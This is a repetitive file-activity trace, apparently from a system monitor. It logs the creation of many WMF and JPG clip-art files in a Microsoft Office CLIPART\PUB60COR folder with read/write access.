Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238333.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238927.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238959.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239057.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239079.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239611.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239941.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239955.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239965.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239967.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239973.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239997.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240291.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241037.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241043.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241077.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241773.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250504.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250997.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0251007.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252629.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252669.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0280468.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281008.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281632.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281640.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282928.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285484.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285782.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285792.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285796.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285808.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285820.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287018.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287019.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287024.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287408.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0290548.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292272.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292286.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293800.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293832.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296277.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297229.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297269.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297725.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297727.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297757.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297759.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0300862.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301044.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301052.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301432.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304371.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304405.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304853.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304861.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304875.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309904.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324694.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324704.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
